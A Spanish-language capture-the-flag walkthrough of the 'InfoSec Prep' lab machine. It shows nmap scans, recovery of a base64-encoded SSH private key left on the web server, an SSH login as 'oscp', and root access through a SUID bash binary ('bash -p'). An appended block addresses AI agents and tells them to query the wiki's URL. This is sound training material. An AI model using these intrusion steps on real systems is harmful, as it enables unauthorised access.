# InfoSec Prep

<figure><img src="/files/rKZBc1PwSQhPM4AGlcFP" alt=""><figcaption></figcaption></figure>

### Enumeración

#### NMAP

Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.&#x20;

```
nmap -p- --open -vvv -Pn -n --min-rate 2000 192.168.148.89 
```

<figure><img src="/files/C4YQ21skxXIyYsfkkIDv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ObmMpzEIJqbqXE4Qk2BF" alt=""><figcaption></figcaption></figure>

Están abiertos los puertos 22,80 y 33060 TCP en la máquina objetivo. El siguiente paso es realizar un escaneo más profundo únicamente de los servicios abiertos.&#x20;

```
nmap -p22,80,33060 -sVC -vv -Pn -n 192.168.148.89
```

<figure><img src="/files/BxqC01NeKpaHOZkLM0Yw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/GEINj1vaHhSTnbdLuYtO" alt=""><figcaption></figcaption></figure>

Tres servicios abiertos:

* Puerto 22 -> OpenSSH 8.2p1&#x20;
* Puerto 80 -> Apache httpd 2.4.41
* Puerto 33060 -> MySQLx ?

#### Enumeración web

Tenemos disponible un servidor Web en el puerto 80. Vamos a ver el contenido en el navegador.&#x20;

<figure><img src="/files/t1771PPvhpc4LxmsJvIB" alt=""><figcaption></figcaption></figure>

Vemos un sitio Web Wordpress. Vamos a inspeccionar el sitio Web para buscar información interesante.&#x20;

<figure><img src="/files/9aWceB07ALAN8eoHRbPo" alt=""><figcaption><p>Posible nombre de usuario "oscp"</p></figcaption></figure>

Durante el escaneo intensivo de NMAP, vimos lo siguiente:

<figure><img src="/files/ghxIGOeeGpddvPvgzthY" alt=""><figcaption></figcaption></figure>

Vamos a abrir este archivo en el navegador.&#x20;

<figure><img src="/files/hEoOx2kFdB52NjWeEows" alt=""><figcaption></figcaption></figure>

Descargamos este archivo de la siguiente manera:

```
wget http://192.168.148.89/secret.txt
```

<figure><img src="/files/8sUNqn8zbkWMprbmeiSb" alt=""><figcaption></figcaption></figure>

Tenemos un archivo con contenido codificado posiblemente en base64. Vamos a decodificarlo de la siguiente manera:&#x20;

```
cat secret.txt | base64 -d
```

<figure><img src="/files/oCb31vEXPjaNKqYHE1SZ" alt=""><figcaption></figcaption></figure>

Es una clave privada. Vamos a crear un archivo id\_rsa con la clave descifrada.&#x20;

```
cat secret.txt | base64 -d | tee id_rsa
```

### Conexión como usuario "oscp"

Debemos configurar los permisos adecuados para clave privada id\_rsa. A continuación, la utilizaremos para iniciar sesión a través del servicio SSH con el usuario "oscp".

Configuramos los permisos para id\_rsa.&#x20;

```
chmod 600 id_rsa 
```

<figure><img src="/files/wFzmP0h6vUNPEy0F187S" alt=""><figcaption></figcaption></figure>

Y nos conectamos a través de SSH.&#x20;

```
ssh oscp@192.168.148.89 -i id_rsa
```

<figure><img src="/files/6jyU0MEcw9g4juufCJrl" alt=""><figcaption></figcaption></figure>

Ya tenemos conexión con la máquina víctima. Buscamos la flag local.txt

<figure><img src="/files/RbG2R2xkFIQ0WkiP6xFE" alt=""><figcaption><p>flag local.txt</p></figcaption></figure>

### Elevación de privilegios

Probamos las diversas formas de elevar privilegios con sudo pero para todas es necesario conocer una contraseña. Vamos a enumerar archivos que tienen activo el **bit SUID**. Para ello, ejecutamos lo siguiente:&#x20;

```
find / -perm -u=s -type f 2>/dev/null
```

<figure><img src="/files/P7AHlkUxJGFObmhP0IEe" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0l1gZaBZYvtieD1AhBnF" alt=""><figcaption></figcaption></figure>

Tenemos un binario /bin/bash, que puede ser interesante. Para ejecutar este binario:

```
/bin/bash -p
```

<figure><img src="/files/GFdCoXGXnSqu0r0eKauP" alt=""><figcaption></figcaption></figure>

Ya tenemos privilegios máximos dentro de la máquina víctima. Ahora buscamos la flag para completar la máquina.&#x20;

<figure><img src="/files/9hkL84Ic7JjNIv9UYd3O" alt=""><figcaption><p>flag proof.txt</p></figcaption></figure>

Ya tendríamos acabado el CTF Infosecprep.&#x20;

{% embed url="<https://www.youtube.com/watch?v=pgUcx_wSxu0>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.securiters.com/securiters-wiki/write-ups/proving-grounds/infosec-prep.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.